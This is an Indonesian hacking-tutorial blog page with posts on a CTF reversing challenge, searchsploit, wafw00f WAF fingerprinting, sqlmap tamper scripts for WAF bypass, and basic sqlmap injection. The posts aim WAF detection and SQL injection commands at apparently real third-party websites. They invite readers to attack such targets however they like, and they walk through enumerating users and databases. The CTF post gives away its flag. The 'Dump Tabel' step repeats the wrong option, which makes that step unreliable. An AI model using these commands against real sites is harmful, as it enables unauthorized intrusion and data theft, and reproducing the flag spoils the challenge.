CTFS[dot]ME WRITE UP PLAY [Reversing]

December 21, 2016 1 Comment

Kali ini saya akan membahas tentang soal Reversing CTFS[dot]ME nama soal [Play] oke langsung saja simak baik-baik.

Yang pertama kita download soalnya, disini saya sudah menyediakan soal yang saya unduh dan saya upload ke mediafire .

Jenis soal disini merupakan soal reversing bagi kalian yang belum tau apa itu reversing silahkan buka link ini reversing .

Oke disini saya dikasih sebuah program file yang formatnya ELF kemudian saya mengidentifikasi program tersebut, ada dua tools untuk mengidentifikasi sebuah program yang pertama tools bawaan linux {tools file} tools standart untuk operating system berbasis linux maupun unix dan yang kedua tools Firmware binwalk tools, tools ini fungsinya untuk menganalisa jenis-jenis format file.


Gambar diatas terlihat jelas format program tersebut ELF berasitektur 32bit.

Selanjutnya saya menganalisa format file tersebut dengan tools ltrace , ltrace merupakan sebuah tools linux tools yang  fungsinya untuk debugging 


Ketika menganalisa format file tersebut terdapat sebuah kalimat "Temukan Flag!!" nahh ini menandakan key dari file tersebut sudah dekat :v

Kemudian saya menambahkan text "Temukan Flag!!" dibelakang command ./Play dan hasilnya!!!


Boom ternyata key Flagnya CTFS{kopihitamkupukupu} selamat mencoba dan tunggu soal-soal write up ctf selanjutnya sekian dari saya selamat belajar Good luck!!





Mudahnya Mencari Exploit Dengan Searchsploit di Linux

November 29, 2016 1 Comment
Yang suka bermain-main dengan exploit mestinya tau dengan Exploit-db yak exploit-db merupakan website yang menyediakan kumpulan dari beberapa kerentanan dan code exploit dari seluruh dunia, Seiring berjalannya waktu, pihak developer exploit-db membuat tools opensource untuk mempermudah pengguna exploit-db agar user mudah mengakakses tanpa masuk ke website exploit-db tersebut.


Searchsploit merupakan sebuah tools security opensource yang menyimpan berkas-berkas exploit yang ada pada exploit-db, hal ini agar kita mudah mengakses exploit yang ada di exploit-db tanpa masuk ke situs eploit-db yang saya jelaskan tadi di awal.

Installasi  

Pada sistem Unix, semua yang kalian perlukan adalah baik "coreutils" atau "utilitas" (mis bash, sed, grep, awk, dll), serta "git". Ini diinstal secara default pada banyak distribusi Linux yang berbeda, termasuk OS X / MacOS.

 git clone https://github.com/offensive-security/exploit-database.git /opt/exploit-database
 

Langkah opsional yang akan membuat menggunakan SearchSploit mudah adalah dengan memasukkannya ke dalam $ PATH.
Contoh: Pada output berikut, kalian dapat melihat bahwa direktori "/usr/local/bin" termasuk dalam variabel lingkungan $ PATH.

 root# echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
root#
 

Gunakan perintah dibawah ini agar kalian dapat membuat link simbolik dalam "/usr/local/bin" direktori yang menunjuk ke searchsploit, memungkinkan kalian untuk menjalankannya tanpa memberikan path lengkap.

 root# ln -sf /opt/exploit-database/searchsploit /usr/local/bin/searchsploit
root# 

Jika sudah selesai install kemudian update searchsploit kalian.

 root# searchsploit -u 

Untuk melihat opsi-opsi tools searchsploit ketik "searchsploit -h"

 root# searchsploit -h 

Penggunaan

Contoh mencari exploit di searchsploit


Dilihat dari gambar jelas keterangannya nama exploit Oracle, dibuat dengan code c dan ruby, exploitnya untuk windows dan letaknya di /opt/exploit-database/platforms. Sekian dari saya selamat mencoba dan selamat malam Good Luck!!!



Deteksi Firewall (WAF) Pada Suatu Website Dengan Tools WafW00f di Linux

November 27, 2016 1 Comment
Udah lama gak update semenjak keluar dari dunia persilatan haha, Kali ini saya akan share tutorial sederhana "Deteksi Firewall (WAF) Pada Suatu Website Dengan Tools WafW00f di Linux" ada yang tau apa itu WAF mestinya kalau anda seorang pentester sudah tau dong apa itu WAF, Namun bagi kalian yang belum tau apa itu WAF coba baca lagi di WAFwikipedia[dot]org. Oke selanjutanya saya akan bahas mengenai toolsnya.


WafW00f
  • WAFW00F sebuah tools yang fungsinya untuk mengidentifikasi Application Firewall (WAF)  dan produk sidik jari Web.
Cara Kerja WafW00f
  • Mengirimkan permintaan HTTP normal dan menganalisa respon; ini mengidentifikasi sejumlah solusi WAF
  • Jika itu tidak berhasil, ia akan mengirimkan jumlah permintaan (berpotensi berbahaya) HTTP dan menggunakan logika sederhana untuk menyimpulkan WAF
  • Jika itu juga tidak berhasil, WafW00f akan menganalisis tanggapan sebelumnya dikembalikan dan menggunakan algoritma sederhana lain untuk menebak jika WAF atau solusi keamanan secara aktif menanggapi serangan
Deteksi Jumlah WAF

Berikut output untuk mendeteksi jenis-jenis WAF pada tools WafW00f keluarannya.
  • Profense
  • NetContinuum
  • Incapsula WAF
  • CloudFlare
  • NSFocus
  • Safedog
  • Mission Control Application Shield
  • USP Secure Entry Server
  • Cisco ACE XML Gateway
  • Barracuda Application Firewall
  • Art of Defence HyperGuard
  • BinarySec
  • Teros WAF
  • F5 BIG-IP LTM
  • F5 BIG-IP APM
  • F5 BIG-IP ASM
  • F5 FirePass
  • F5 Trafficshield
  • InfoGuard Airlock
  • Citrix NetScaler
  • Trustwave ModSecurity
  • IBM Web Application Security
  • IBM DataPower
  • DenyALL WAF
  • Applicure dotDefender
  • Juniper WebApp Secure
  • Microsoft URLScan
  • Aqtronix WebKnight
  • eEye Digital Security SecureIIS
  • Imperva SecureSphere
  • Microsoft ISA Server
Installasi

Untuk menginstall tools tersebut kamu tinggal pilih script di bawah ini.

 python setup.py install 

 pip install wafw00f 

Untuk installasi di ubuntu gunakan perintah berikut

 sudo pip install wafw00f 

Contoh Penggunaan

Target saya disini sebuah website perbelanjaan www.salsastore.com saya ingin menguji apakah website tersebut terdapat firewal WAF atau tidak dan ketika di check.


Ternyata website tersebut menggunakan firewall WAF produk dari Ibm Security. Nah jika sudah ketahuan terserah kalian mau ngapain website yang kalian incar mungkin mau bypass waf atau apalah terserah kalian. Selamat mencoba Good Luck!!

Sqlmap Tamper Scripts (Sql Injection dan Bypass Waf) Tutorial

November 21, 2016 2 Comments
Selamat malam pada kesempatan kali ini saya akan membagikan tutorial sederhana hasil surfing di cyber space "Sqlmap Tamper Scripts (Sql Injection dan Bypass Waf)" pastinya kalian sudah tau dengan tools sqlmap kalau belum tau saya akan menjelaskan sedikit tentang tools tersebut. Sqlmap merupakan sebuah tools otomatis opensource (Sumber Terbuka) yang fungsinya untuk melakukan pengujian penetrasi mendeteksi mengexploitasi kelemahan Sqlinjection sqlmap juga mampu mengambil alih server yang sudah di exploitasi.

Didalam tools sqlmap terdapat sebuah script (Tamper Script) script tersebut berbeda-beda fungsi, salah satu fungsi ialah: Bypass proteksi Website (WAF) tahukah kalian script tersebut bisa di gunakan bersama-sama dalam satu baris. Berikut syntaxnya.

 sqlmap -u 'http://www.site.com:80/search.cmd?form_state=1’ --level=5 --risk=3 -p 'item1' --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords 

Dibawah ini adalah beberapa  jenis set tamper difungsikan untuk (DBMS), sangat berguna ketika pengujian.
  • Script tamper
 tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes 
  • Mssql
 tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes 
  • Mysql
 tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor 

Simple and very easy Good Luck!!

Referensi:

Basic atau Dasar Sql Injection Dengan Sqlmap di Linux

November 20, 2016 2 Comments
Menggunakan sqlmap bisa rumit atau tidak itu terjadi ketika Kamu tidak terbiasa dengan hal itu. Tutorial sqlmap ini bertujuan untuk menyajikan fungsi yang paling penting dari alat injeksi sql terpopuler dengan cara yang cepat dan sederhana. Sebelum menggunakan sqlmap Kamu harus terlebih dahulu mendapatkan rilis terbaru dari alat tersebut dan menginstal interpreter Python. Kebanyakan distribusi Linux memiliki python terinstal secara default. Jika tidak terdapat python atau jika Kamu tidak menggunakan linux, Kamu perlu untuk men-download dan menginstal python.


Menggunakan Sqlmap

Jika sudah mendownload dan Mengekstrak Sqlmap kemudian pergi ke directory tempat tools itu berada dan jalankan perintah berikut.

 python sqlmap.py --help 

Uji Parameter

Untuk menguji parameter kerentanan. Jalankan perintah sqlmap seperti yang ditunjukkan di bawah ini. Pastikan Kamu menentukan URL melalui parameter-u (atau --url) dan menentukan URL lengkap pada halaman yang ingin diuji.

 python sqlmap.py -u "http://teamgear.us/store.php?id=1" 

Pengujian Parameter Post Menggunakan Sqlmap

Dengan tes sqlmap default hanya pada parameter tertentu,  Tetapi kamu dapat menentukan parameter Post Jika ingin memverifikasi. Sqlmap kemudian akan menguji parameter Post yang sudah ditunjukkan. Untuk melakukannya, tambahkan opsi --data seperti ditunjukkan di bawah ini.

 python sqlmap.py --data "username=xyz&password=xyz&submit=xyz" -u "http://teamgear.us/store.php?id=1"  

Bentuk Parse

Sqlmap memiliki fungsi built-in untuk mengurai segala bentuk dalam halaman web dan secara otomatis menguji. Meskipun dalam beberapa kasus scan mungkin tidak seefisien itu adalah ketika secara manual menunjukkan semua parameter, masih berguna dalam banyak situasi. Berikut syntaxnya.

 python sqlmap.py --forms -u "http://teamgear.us/store.php?id=1" 

Tingkatan Test

Dengan sqlmap default akan menguji semua parameter Post yang ditentukan, namun dalam beberapa kasus, Kamu mungkin ingin menguji titik masuk tambahan seperti header HTTP. Hal ini dimungkinkan untuk menentukan dengan opsi khusus, tetapi teknik paling lurus ke depan adalah dengan menggunakan opsi --level. Ada 5 level yang tersedia di sqlmap (default level 1). Level 2 menambahkan HTTP Cookie pengujian header, tingkat 3 menambahkan HTTP User-Agent / Referer header.

 python sqlmap.py -u "http://teamgear.us/store.php?id=1" --level 5 

Penggalian Invormasi Dengan Sqlmap

Hal-hal yang benar-benar menarik dalam sqlmap tutorial ini adalah melakukan penggalian informasi. Ini adalah tugas yang cerewet untuk memulihkan informasi yang tersimpan dalam database dari titik injeksi Sql, terutama ketika tidak ada hasil dikembalikan langsung di halaman web yang rentan. Untungnya, sqlmap memungkinkan tester untuk mengekstrak bagian berharga dari informasi tanpa kerumitan teknik manual.

 --current-user --current-db --is-dba --users --dbs  

Pencacahan Tabel

Ketika pengguna sesi telah membaca akses ke tabel sistem yang berisi informasi tentang tabel "database" sqlmap akan dapat menghitung tabel.

 --tables 

Pencacahan Kolom

Sqlmap juga dapat menghitung kolom. Di sini sekali lagi, pengguna sesi akan perlu memiliki akses baca ke sistem tabel yang berisi informasi tentang tabel database

 --columns 

Dump Tabel

Hal ini bahkan memungkinkan bagi si penyerang untuk membuang seluruh tabel atau database menggunakan opsi berikut.

 --tables 

Documentasi lengkap Sqlmap.org Sekian dari saya selamat mencoba Good Luck!!